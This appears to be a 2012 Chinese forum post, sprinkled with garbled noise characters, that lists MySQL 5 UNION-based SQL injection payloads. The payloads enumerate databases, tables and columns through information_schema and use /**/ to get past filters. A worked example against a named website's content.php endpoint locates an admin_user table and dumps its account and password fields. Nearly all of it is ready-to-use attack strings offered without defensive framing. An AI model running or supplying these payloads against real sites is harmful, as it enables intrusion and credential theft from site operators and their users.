查库8 S& f Z: q! r; F5 }. @) c
2 H- g% N8 o0 w$ ~# e! w
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
; Y3 {: O& Z8 ]/ |# i; Y8 t% m
. Q/ \8 [" D9 A. e8 u查表
$ t* p# s6 t2 `2 W9 y9 d/ h2 {( \' T+ m* E
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,14 `, L4 u2 ^ J* U2 ]$ }( U
$ t( r1 I1 k6 i K查段" B1 d; D8 A U* D% n5 v
0 D( t' g+ p- c. c! g- hid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
- O& C/ I# M$ } ~( Q; i; C+ w; K9 H& o3 f
P, H" a) }. _
mysql5高级注入方法暴表, d" w8 {" W. M% J. D3 ~1 y
`" f9 h5 K* q6 O例子如下:
" ~6 Q# W( B0 K+ \4 @) k- c) D8 s5 L0 W7 _: y8 [
1.爆表
2 M+ u0 k, Y) P2 n3 S2 rhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
9 g! m( @( G- j' K这样爆到第4个时出现了admin_user表。+ @) e; n, h& r4 [$ g+ t
1 b8 u8 L$ h+ u2 s0 E/ p
2.暴字段
( d8 g: g; Z: o3 d' }" ihttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*: z3 z: R) R( i: z7 _* `" [) O7 }( [
% m- q; V* R) L5 ?# g1 J0 {, n, [$ N8 M$ r- X
3.爆密码& R& I4 A" e5 I! H0 H, M
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* # l$ s9 @4 M9 C, `' c6 \! k
8 w8 h2 G2 {2 `& [6 P/ }5 R
' V% r; i9 c" j- M
|
发表于 2012-9-13 16:29:37
收藏
支持
反对